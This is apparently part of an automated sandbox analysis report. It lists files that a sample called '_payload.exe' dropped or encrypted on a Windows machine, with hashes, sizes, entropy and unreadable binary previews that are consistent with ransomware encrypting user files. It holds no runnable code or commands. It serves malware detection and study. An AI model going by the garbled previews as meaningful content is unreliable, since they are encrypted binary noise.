                                                                                                                          SSDEEP:3072:s7O3D6TeNa8AhIk0W3hl6FqttcIeh6X8UGNWXr9d3LhPuRAxkF:H3CYahWIeh6MUGmPLhP+A4
                                                                                                                          MD5:2F6E4A36F690293A885459BEC54A834A
                                                                                                                          SHA1:F90EDB329C24FA60E8CC1396059A807A54A82E54
                                                                                                                          SHA-256:0325A71BD1016D68EB132200760FB1AC1D6DB1B15571A48AF4B72BB1FF0F57DD
                                                                                                                          SHA-512:FC6D02F89B1E299DD1A3B06C4D1734AB63AEDC6233284181EF620B521316FB93AF54F1808FD1FC2D8A3B4488EFA719BCCB2856F56A8B4E1A33A0339E88E7A138
                                                                                                                          Malicious:true
                                                                                                                          Preview:SQLit.|....4.(.&(;.. F/.>.1.]...-c..Q...h..Ff........!q3.....,l...q....k..~...A.T@.5......B...)h2...._....yc.*?.e..J.N......B@.7......,.....7.p...W.1P....J7+..!v&.'.q...........>..zp)R...<.o..........11.X.i..UV.(c.1....s....q........ ~......0WC..M..G..4f..b4j....u..j....cE/.._..j.''.p(_....p..J......O..{.....Z..'.....R.Z..s.3...g.6r....n..:....8..........W_o.E..Om0.O.q;.3nz..*4..j...K..0.<7Nw..g..-...Y^.t..$W~.(!...A./...c..d.P.x\K4...%D."g..._....({.:v%...K. ....#lO......p3.Ov...=.2p.a.'.1r.hms....j5....9............|d...[Z..$:B...*z.....n.q..*..W.3*....z..M..%.....~.......@....C...Y...%SC..Fj_.8...%]G21.u.}.b......i..".......w|.MP.....r-..=.DO.).9....n.#`r.V.V?.Fy.]$((7...1.,.........f..K....{..).{+3^...d-@.h[A.!.p.d.*........5k".........I..ke...>.E.Z..= z............*..I.....J.d/.)I.v..9.6..n...0.?.v.........Sm...7.....v......"...6..qp..../ER.X..=b5t.c.s..K......r;..H\.dK......Tt......Kj97.6..-.R..o...1....<)..|..K.'m...7.

                                                                                                                          C:\Users\user\AppData\Roaming\Skype\RootTools\roottools.conf

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):410
                                                                                                                          Entropy (8bit):7.378100604772861
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:YEoaz+ThuyS5HGM7IC2SpHIv1jce+ePBtLq5bTcii9a:Y9aEh9jUIdas1jv+ej+bD
                                                                                                                          MD5:A2EB561988EE85149BC0D01413F557E5
                                                                                                                          SHA1:4938F798B6EED37106E6C683C288954EB061EEA9
                                                                                                                          SHA-256:87C328892019C36B20B9325C523DA6112539EC3569E7DA2F7C219A79AB68D8EE
                                                                                                                          SHA-512:DC281AD99DFB5F5D0E713A8D19EC47E834F3A194FD1031E7B3A651E29ABBB713289F0151945F72EB14062EA91DCD78E148502CC2D13B656FD1FA031C0E702815
                                                                                                                          Malicious:false
                                                                                                                          Preview:node_.......M.".8.nhge.k...@..1...5NS.X....z.............(.I.D&......./...3I.@...<.by..TN....C.N.&.....j.q.1Aq....Y..N.G5.c..B[....+.NUU..z:,..j...X...z.)..`4...$d..;v....s1.f..x...LZ...+.......j!.Mf...9S.=.......1.*6....h.v....j..U...p"...n.cB.l....B.th........C...mG..X.......7fB-.:4..;rL....DC.t...$.....(d..phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\Application Data\Adobe\Acrobat\DC\TMDocs.sav.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):370
                                                                                                                          Entropy (8bit):7.191971716539646
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:s8y5CHJfToZDcIxTtun8/CEffAfWbUPB2waUCshdJq5PDTcii96Z:DH6vTQ8ZYfWbpONq5bTcii9a
                                                                                                                          MD5:46C0E97934485ACF5707D3348BCEB979
                                                                                                                          SHA1:5355282ECFFDB8D0194F1091F4634157192E1E5C
                                                                                                                          SHA-256:068B9C584FFF1C3EC2316B8447D74A174D9324FA28C6A4287EB06DE25313F5E1
                                                                                                                          SHA-512:40FFFCCD071976FBC904AE8E88CAD8841D15E9396A61E2ACFAF4E46918A7091BFC300777327A5DF0AC3053433116E518ACF79A092BB0B60B66B36FB396AC65FB
                                                                                                                          Malicious:false
                                                                                                                          Preview:%PDFT...i*.<..~.....*X2..W.z..."D......d 52.....|...V.",C/[....c,..B5V....U.WA.s#.cO...+t.TJ...(...*&..-.<.Y?4.M.....#+4.x.#.b;&Jk.3..2y.x0..H&.l....R%.A.B..0BF....b~.6...6o.).bwv.'..Id..YoF..Xb.n..|A.]...[.l...@.h.B...B....".....1+.lq..dd..c.b..Y..n....2.+?...7...v.CphJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\Application Data\Adobe\Acrobat\DC\TMGrpPrm.sav.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):388
                                                                                                                          Entropy (8bit):7.363595084817419
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:oCINIjC+ZaY+Kcc6+KYEqiHS2YEzzq5bTcii9a:oajC/Y+Zc6+KYjMGbD
                                                                                                                          MD5:84E732773D6B12D0070AACE833230FC7
                                                                                                                          SHA1:A78BC4910A1B3369C4E268EC0DDC6ED96452B7C0
                                                                                                                          SHA-256:BC3DD1B510B2A889AD365521C462515AF0B115B00B04D665C91E4594DF30F30E
                                                                                                                          SHA-512:E88976992609880174D198782AB737A6F1B6E9AB288134ABAAB329006253C9DCA534DE38F3DD907244904B4054798D6003AA5AA1564797F63BD1A19C97DFADF0
                                                                                                                          Malicious:false
                                                                                                                          Preview:%PDFT.!Ky.?...&zeE..S..1.y\a...~..x.N.R]...`.{.Z.S.Lv.0#..$..J.'/*.3.0PQf....oO...>....y.<U..O.i'..5..."...gW.!.:...]..U..<.U..1.d...j..H@.`.$..;.(/.d.X9.ok...c..0...e.#...n.G.9..E..G......3...GB.....9-.za...J....H..q7..wd.^H:.=.A.T.s.9...x.#OC0...._;.Z.)...oa...A...0.:j...]..7.8}.:.F..k.o...q.B..phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\Application Data\Microsoft\UProof\CUSTOM.DIC.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):350
                                                                                                                          Entropy (8bit):7.223972817834662
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:QI2LUgwcKXPG41zqaPFh/0WjZqOf5cPJWWXbbxPn8N9Zwt7+MImGQGnIcJmOW9pd:QLL2xnXPFh/bZ1xqFbdf8N9I7+JmVcJO
                                                                                                                          MD5:A6CB27CC420439489492489A7ECE5D83
                                                                                                                          SHA1:4C10EE2405974C9B99EA091FE6425E0BE6E3893C
                                                                                                                          SHA-256:836EB84918272C8B04105E541CEB175EE90E09D12EEF8017BDB1F9FA0F675E50
                                                                                                                          SHA-512:131DA30DBF7A2F9074F3CCE15D823B1455B65F5D72FABF3BE2F284F55801818A50B649294A7446DBD413B465BFD2DFFFC5B63E58B246B5DADEC2B41479E2D3FC
                                                                                                                          Malicious:false
                                                                                                                          Preview:..j.o..8?t..G<.........-.T..m..\.kEq...8...E....|mw.+..n.d....R....nU....t...Z.........|...Y.y.[.x..q...~..@8...:..[~.v...1..v.".7.......h..T.x.....h6..X.pi-..2c...#."C.g.:.y.=. ."...L....D.=+Td...>.tr....%A,.9.-.%.Qc.|:A.4...u.g=..@.1...dZ...0mzZNi.._..E.aHphJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\Application Data\Microsoft\Windows\Libraries\CameraRoll.library-ms.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1352
                                                                                                                          Entropy (8bit):7.870620637406578
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:Hk4p64mnFwyqhCiTmiaKTFk1sYCUfXbUA5vhe4+u2CiiU3dseb93eHbD:Hk4phuqyQCiTmuTFk1zrUAN84+u2Td3i
                                                                                                                          MD5:CE723EA7BD9C946D873C83F758E6F87A
                                                                                                                          SHA1:BCB6319193F20A2B13AF24DB3A7CFC69B6C035DF
                                                                                                                          SHA-256:F171E73C60BDA1EBFC38D820C0C8396F466CD46C2665B5433CCC8179214DF605
                                                                                                                          SHA-512:BCD9D842A1A8EE71CF109D94A43B468259A71EB86A78E4B31B4613AA334ED36FD27B0626D9A4FEBC3837CB6D22B47694A62BA8575096DD45BC708CEC3729A233
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml...\-..`z...v2.[.\.mF,U...`....Li.........a.X.....q}...?*...!W.r*..{.5..=.....`~...p...m.......U...nt@Z.@Q4...-..d...s.D.\.P'..y....tK.)5r.f..<I...t\H[<$i&}.X{F....... ...$.@u.Q.I.0..`x.@<O...._..q$.U9X....w.Jn.v.Bl"O.T........O...]......w.s...,.tU..4....p..g.w.,=C...I.Z..&[-.....X.#.C.....$.5.6b.W.;.;e.q.{... .....eC.....c]6.....b.......+y.v.........'.j*|-...*.~.hp.AMgXX..;$....1..H K.W\.U$.j.....Up...yM.'....(....B...!.....CzHY%}.G_...f.P..CH...K........b.{_..x.^q.c......4.i...{B..........C.{.=.|.....3.n...N...'o...F.....H...cA.x..yG.p...]m.-h[.L...|.{eUX*..sK.%v5.0au'.2..$l..)..i...:.`.........~...{.Z.......i.W.r|..l..%..-SH.p..jv]C&x.f...X@f@...$.d.....{./....... .x>..h.S.+b...uJI..k../2..:.@....,.....3.....E.......y\f."R....S..7..=.H&^....h.b`...U..U..E.......)...':w...>..G..Q#<9.x.>?'i.<.0...Il..r..ea.@.Rv..../.=....[k8.[Tw.....d.."uG.vuX..P90:k".m..8a.u.^iZ...1K...'.rn..O.k....o}..Y....[...5...<..y.,~.^n...,V,...1.M

                                                                                                                          C:\Users\user\Application Data\Microsoft\Windows\Libraries\Documents.library-ms.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2424
                                                                                                                          Entropy (8bit):7.910992894872235
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:am3zxi1YBmbq/QwEKHiq5do7d+V17lfvGMLPEDf/rL5XKu1TpAjxmtEnJD:33zxetq31Cq7VxlXBwDXrLFKu1TRt4h
                                                                                                                          MD5:A1F5F047FF31E7A33FB57865F5C80484
                                                                                                                          SHA1:43D87B6304290C0B3EB65AEEBE52CD97D6BE27F7
                                                                                                                          SHA-256:C12284B52570894B68EE8A35A83E4D544ABEC27762AC484AF3B3113CA2BD2911
                                                                                                                          SHA-512:C2EAB35FB6E696B72B1F049E3B5D7943C03DCCB04FD3EFD6164BAAE093D518D380F9B868138878801C32B602C100D3B2C9D8042F8EFD405495BB5981D8A196AC
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..IG..L..~.....F8.K."..I.....7..%....O^FT.........k.s...........`k.(.G.@.....?.r......!...X..q...<qk.o.3@+.$..s...G{4.....r.)..Y...>j.V0w.HS.T....2N.?...H....M...?....4..j....T..{.}>70.fp4.....5z.Z..;e.....k.U6Y./.w......96.?.ZJ!..&.{.....)..W.Hg.L......D.?_...^....V..:......[......B...V.-......)..?|%....j(..,...{..N....l......[..l......b\k.G..Ud_......;W....".I.8[,9;.0..b....y...C.FD...Y.....bm...-..=H....*..Yc ...4.I..O.<k._.(..n.V.02o.U...q.u=.`.UA....|..cz..3*..'.#..f,.....//.w...M..F.j.....f%>0....`hJ..1.u...iN/u._G...m.-w.....U.6f..\G.........h%....w..nF.o..XW..Ng.Re.D..'{..Ny/..@bt...%G#OL=...k..u.....{.....r.VJ1.C:....Z......].q.*.ipg..[}w..6.a..\y3........8aP.=.!........Z...P..i.^V/]/0.>BG/tkP...."J.V>.D..&.N...}.l.X.tJ.C...@..|ZLq..<=.R..2.c..,........^K.ZCb.........wj.....sqhm.U..3Tu........z=.s...:....?.....A..<......."..O"..O...jh..%....k.;..n.p.qc..Y.r..?.@.b...$.IC....,....m.T)....E .e.....cm..1kQ~.X.;$_Ey.7....:.i.p.9...L56S

                                                                                                                          C:\Users\user\Application Data\Microsoft\Windows\Libraries\Music.library-ms.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2381
                                                                                                                          Entropy (8bit):7.931925300137616
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:OpXqZ3QzCdwQBDyblPzaG6FB9E+dWp7ivtpN/FzRkQs8D:iXWQzCW0Qw9944t5Kq
                                                                                                                          MD5:DE95EDFA8483AB6484201165EC7D9814
                                                                                                                          SHA1:F80F93CC33D6EC7FCDC07476BFCA5252602E5934
                                                                                                                          SHA-256:D6E1FADE77B58A16C1DA7F4C07CCEB4721D1A02BBBD54B49A7DA696202365F99
                                                                                                                          SHA-512:A897DE0F07B168B8E79FC2BE152022EA4A0F00A98AF45C1FAEBD09D9170530A51A110BEBD3491AD651B30943EBFA26E4163F0B3DF6B6FF952865898E860DEDCE
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml .=.X....\.6e..W..B....Nv[@...S...5.^.....Odp.......BBU4|....ki...)[.........).W1B[....iz....|....os.5..V+..qf0#C......]jU.2.....!.w.....B....m..'9.....=..k"8.....e.k.......X.-P....c....U'.b[......b.+<.T..L3.....%U:)(.q+:..f*sg..pr&._o..h...../C...S......$x;....O.X.......dBi<.8......=...x.9.q.#7..*|w[.X6O....k..R.1o.{DI..X..e6....yE.e.~p...W=c.t...m+....$........,v..$..V..1...'.....F....Q...j....E..K....F.n..X.;=..L1qr....7..}...a.r'Q.5...h%?U6.x.........B..6..z."+.'.......4.+.f.'..T.M..Z..L.e..0..AZ.&.KF......h..G. ._...}.>e....$.r....Z./..^B.0...y.......H.Mp.{..........v..>...c..*.L.B....2...!.z.R.j.e.N~..Z_m.4..C.epk..I.X.-5..Z.?.~.+.?..x......XU4..*..hE~i.8fq..Fa*.......?.q.....I....U.:H.+D..vo.q.{...m.hs.....)d.....7...8.vUu.:L..ns..1.h....ZO....US...#...e{..bu.Kb%...lj.H.H........}..".^....Q...c..2M.c[..../..6_.J...a...k......y.k..........].o2..ru.?.._a.....T:.......(.P....*.p.I.ugp.).....S..KO.InA..@.?Zt..K.r....

                                                                                                                          C:\Users\user\Application Data\Microsoft\Windows\Libraries\Pictures.library-ms.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2398
                                                                                                                          Entropy (8bit):7.917170968085167
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:Uc0ZY0QsrJLLPtKx4WZKyjdGXiTV1Z/ldcrGBhxzMApsFYv5OkV0WHGED:U87YMx4k9dGXinZ9dOIPJpsYRPKwh
                                                                                                                          MD5:6C976E54C37FD581CDAD4448A215B953
                                                                                                                          SHA1:9824F99801653C5DDE241AA6F54466FC907A524F
                                                                                                                          SHA-256:42AAF8837A8A707829C7717DF200EBB5EB2DB8D2F82CD16ECF4FDF636565C9F4
                                                                                                                          SHA-512:0986E75950DF9274C8A8369464E3D7D7BB2F65D92CD8D6DE15B76862E0B662AFF586A78FB8D0D6FD6F688DBD0B8F24FE5872D08DD224034DA98AAC32BAA0F132
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..;....v.......L...S...F.....g..J...r..(b,1Z......L..'8...V`.I.2..L...m.....L.t.T9}oO/..~&r..O@.b.Z..yms.v.....2...R]...%.......j{.y0.F...R.j.t ....T..o...b.Y...h.].....Sa....6AF.x. ...h.`......<.T{......,...KV/.2Q2....6....N.M+IHA.:n......~....Q'....]B...0....:Zj)4..O.........B....1r...!=).+...jCr...h.MG..p.[wA..Mn.s.......v.*...x.1Wm...!.}9h......a..EC....ww...y~....P...1.H.O...fU..\..Y...xE...]......vIYQ..H.T.~*_"..r.....>..L..T.}.....*V.Y.....h5..4....q..2,J..@jp.....#.9.V...f1-..:....m.z;*-,7..YD..0+.85.f.69r..g*5.IWHSjn.<?.|$...8...Z...<..S~WiX.2O.o....me".7n......B.'c.tVc&..b......g1X.......QH..X2..,r.|h9..FO4.9$h.|.S.:Q.m.<.......$j.qw"5.2_h$..zO.!......3...pT.NZ........g0.......5..4.Bauf....z..%.D..J..0 ...l.v....u....w../W2.}..$q.>Q.....f..".}..7....DzA.....6.$.9..'..9u....SM...*...N..z..IZ..T...#.i. .p.rb$%.Y.@Y$.n.....Ic...R.g>..%........p.U.....B\.........+...<`.&..d#.3...A....|$|..BB/a.....M.9..a...M..$..$...-.l..L.

                                                                                                                          C:\Users\user\Application Data\Microsoft\Windows\Libraries\SavedPictures.library-ms.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1358
                                                                                                                          Entropy (8bit):7.85514337507523
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:0Tj4FBSaJfH/FGkvZAwSv3s6nHC2W6oIhS1N2+jNj6Rg2mUPxvVGubD:Uu3V/FGkvOwxYHDqV7tUPpVdD
                                                                                                                          MD5:72C88CE8AB773EEFB3C1074C0068A8C6
                                                                                                                          SHA1:4A54F750E71C9692BE01AA38952642D30FCA3DBD
                                                                                                                          SHA-256:B1004E2834144AB0339B87B91FB4E512D01D9C401B94373FF5415EB7A197E15F
                                                                                                                          SHA-512:B3FD1B739DE51BB857481BD4FDA4E7C503724C04343BEE742E61CECAA126C556AB06F405BAD0F178614DF762E81F309535818B16B6F8E6B9A59CDBC582C8BC1D
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml{.......zh.....Z...G..X...7.T.>.0.h..^.....I.3W..`{.......!..o..oB.......E.....b.|.".....1....lcw..+_.FyD2....oB{..s..........{..iv.?.....%T......9..'2.Kf.....[....V....@.2B.o.......gn8A.O.p|4..ps.SUF'..E....%.q....z..`.....Z.K.O..H?.......Gm{...O.....?qB..R........kz...t...(.'..n.q.....@SK@..u.4u...#.I!8-.....,.4.s....:.....2......z....,ym......:.%B..w....8...;g6..Yw.Q..-..o.3........W$..QG]NO.M..F.....fn...7......O7...Tg.......`..AA.1U..&.<..{..].z...=.v|~l! .?...~.........*.......0..A.=4.&.*.E%RZ..JC.t...O".y...I.f.8.q.....3.m".....E...r.S.....apO...t'......../3.J1b.[_.s.].W.WB.../{...?..F....v..A.=\.pXsQs'.)"...|...-.T*.......5..ga.nl&.....[..o(3..j...".V..~.[...E...'..'....8.....a... t.....`g.a........oP|[39;&6b;Fq....>^.ul.W.7.t........:/K..p7v..".I..Z.a.j.......u...iD....._d.&...|d+"..>Kf,ei"x.4r.6....5..$....RBcS.N..e!.C.u..i.r......X....... ... ..?......C..~0.~.'n...2.@...`.M.T`..J..6..X...i....)..28d...]"...b.

                                                                                                                          C:\Users\user\Application Data\Microsoft\Windows\Libraries\Videos.library-ms.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2409
                                                                                                                          Entropy (8bit):7.929664030196034
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:f6JYpvLnNyk5mX+IVQD/CAHHwd1gqzInMV7najH++RVZVi1zVF1izGr8D:fmY1Lnckx6Cwd1g07arpMSU4
                                                                                                                          MD5:2FEB5599F2CBBC7FC66E290F5FAEB12F
                                                                                                                          SHA1:03B27498DA3E5D1643F72C7E76E2772B698A387E
                                                                                                                          SHA-256:3523649520CECED966BB5B71DFDC593C4D42C68C0B6EEA81AE76F3BE18C42D71
                                                                                                                          SHA-512:A048D062C6F024344B07C6C15602589C7AAE1A76787213516CF3D13DC52A92A080B5313DB25FFE5BD7588AC4D5A948BB18A5DDBF17F319ED5E91848DCC5120B5
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.. 7.{A.&.v.....t....F,..5-.te.}.x.].......$(.-....@S..>.|..pu...b.*.............^......6.#.E.z..:...Q...#.W.F.\]._..yuj..#V....5$c.8./...8@S..A&...8..T....ezL.QT......7.V.l...Y2.l...2..U.4...H0.#4.,..{!.t.....e3..C..l.q..0...1..*....H:...V.... ..I..8;..+w%P6.&5.H6.\.....lv.4...r......V<...X..@c.S......<...Dt..eh.M.s)..........6..b..:.?....~....Y....0)...*...&.P{..pI...N|_...lIo..\....W.Tf...$i.j.v..L........./L..K.=...>2/4...E.K..A.......'8..hK..K.:.m..<.....d....F>.6RT...kx.`..;.= ..X..t.....-..i.A.d.....N...x..5.7..R.s....8.||#...+.}H..)]..;."........c .x.....;..~..].6....I.........o.!....9g.d.C.o.$MA./...K.>..C..4 .WdC.....,.o..A..f"d.gx..C.,..}.N...<..]X UXr..-$."s.Q\.;)....1..2P.X..:.r.S..Dq....'.[.7.R.Q@.qA."n...9.....5.3c......D.1......R.b[.=.m.........F.....A...#.S;.1.....M:..#...'f.B.Yws2.8..{.`>H.....?..f...$.m[..99.>..Y...K.E.j.....-O~..>Q..].4.%....s9.........4(X..h7.......o...!C.V....R.s......-...p'.q.X....&p.

                                                                                                                          C:\Users\user\Application Data\Microsoft\Windows\Recent\ANHVHMGQLM.mp3.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.865346689638786
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:hZNRPh4NstGya7TuTOFVD8CDTcUoCDzHBY0JMxHq+ZukFm+KB4MAnobD:hzU6CiaFVdDy0P+ZVC6aD
                                                                                                                          MD5:B7BD5080691077EEEA3B7614970850C3
                                                                                                                          SHA1:239DC9C5B305264FCB81A2C5720F1D53CABECA17
                                                                                                                          SHA-256:A3C8B55D6996B6425A345864962A2750944A7CCA3A96513E31F4EB182D6C0747
                                                                                                                          SHA-512:3DB0A279EFCFB06284636D210993486FCCF18D66228C98095AC02FC8370049472E6B1FAEBB6948B35B401CEDE4C49AD2A2DB2D939E0CA80A13B4F69808257004
                                                                                                                          Malicious:false
                                                                                                                          Preview:ANHVH<...w...=")IL....4.fA..bQ.y......-s.u.....$.5}...@.E)...|U....2.......Z.a%...A.u.<....?(6fjt...s.0 e...-.V.H..L.3.O.v..g....L....uQ..dI......9q.5x.Z.y...x...0..2.}.{..5c.4B&Uwo.b6.bM..H.x.4....]1%.i..H6{...(...!.... .\f..l.>6.V.....?......*...._.....r.n.C....4.-0.S.'S.!Kg.1-.u..}..y......D...S.-LS...Q.og.!D.D........h..+....p...l..CF..]...m[z..'.....o.xY...[..h.q.....j.'...c.u.B.........oM\Q..<......SH.}.*Q..dd^o`/.....)+..ML...S......c.tzk....$.a}t..D......r.'.....H..LB/.R0.x..%.8.99..o......~..Q..!..Mi......(eJwE$Z....72....O.h..e..>..m:..p..Ut~ ).{..IIf..?{..n......:?F...P.^.G=.....a+.....,S.k0..f..=..|.:z.k?.usU...zc..F......7M..*.f]....EV.I...~...950.....O.K..?....v..p{lA...3(%D.^$...0k..W....{xU.....]........m)..........Ni!..... "...%.o[......AQ$.....+.y;...t^..W{f......X...F.....0..Y_yP]$|..\.>.P...Y6..F.p..0.J..ch*|..q..f..=`.&J.&oC9..+}....).%...O...........CD...j.P.pT..A...\...|...k-..%.U.u.ed....C.I.../..C........

                                                                                                                          C:\Users\user\Application Data\Microsoft\Windows\Recent\AZTRJHKCVR.jpg.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.849194227385491
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:i+raeBtA+cg1ArOyBuCRPxqc/L7z9McznKvrAWOBls3SisbvzbD:iM/jATg1GRPxnGcuvhOPJD
                                                                                                                          MD5:8C75D33512CDA7050DC545A2EFDD1F56
                                                                                                                          SHA1:03AA5721882A98440B4D77D6F57A0D867B9B8EF1
                                                                                                                          SHA-256:86A8FACADCDD629AE17DEE1EC0F0D059362C5119B1B0FEDA4CBFD441908D4B2F
                                                                                                                          SHA-512:AC40F943B4665DF9D79BCAE0A8A3BDEA25EDD99266C1A3D34D127E54664C10376DBC2E8AA564FF0AB6D7ACCE789301931E03B515F62E7D30A9ACE79C5DBA80F2
                                                                                                                          Malicious:false
                                                                                                                          Preview:AZTRJ.$....@.....%......J....D.FK.X..I...{..w.r:..`............;qdw...?.C..v..T*R\.....M...B.....t.i/.4._.......7.i....I..H....(1O%...iE.|...o...f..l......{....O'.S....9.F.c.IX.0{r.*..>.......w#..`]~OWm1...#.L.[..a......t....R......M.d.."1 ....d/.ut'h.d.B.B..5.d.g.<.*...P..JbuR..J...\.4.e.....g._.1..'..O....{....E......w.Y&...7....^...z..\|*..Nv...b.....D.f...H.t......jj.Aw_X....\&...~K.h.4-X..A..5...... ....'3=I...........jj.6f...@..uH.m....0...&.D..qz..'..qU.....V$.......jkN...,H.H..76/V.k..o.<p...v..?#.."...Tp...<..4.p.]+,...>*..+ ..H..1..C......Rr4..m..0..B...o}.2~...@.o........}.F>..).;.Il0..'..w..g(._.f....Vz.....Bo.L7.>I..R..y.......P...!\C|.*..H....S[.....r8...S..k......$.`...N-....y..n%7/&rK..e.].8.A.J.H...5du}.0w..O.f...[8..E...-.Vh4.5Z..j......O@.=v....A...&....b...9.nDm.j.S...).. Qw.!?r.e..wk)./.f}&Y...oS...).1.5Wm#'....*(..!...z..."cE..,.,}F.]...2e..<?......*y....o.>y;^.....g...~R..........zg.R..\.....=_.+...fQ.....f.. .x.5.

                                                                                                                          C:\Users\user\Application Data\Microsoft\Windows\Recent\AZTRJHKCVR.mp3.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.831101303520289
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:C2B1fQO7y0EoO0R36dkTEeK2dz0VP/5CzCaMBSs0Wuty/pyAbD:C2/IOy/VwRXExCziBgtyhyaD
                                                                                                                          MD5:686257AD4241A69ACC654DA83367D255
                                                                                                                          SHA1:202CD20D4279A01E8D9792ED7865C2ED31D9DC28
                                                                                                                          SHA-256:AFA25B4426EBDF4F11B31710E41B1D678DB0631C078C0EFF76177CD94720D099
                                                                                                                          SHA-512:556C19CD9CC05E47C49F4AAC013210763A91B08C2D09D3123B6A0E22EF661D7A4C9ED025A87EE3D15029C9733334986EDDF71AB4298A1646EB5F061A7FDC6C95
                                                                                                                          Malicious:false
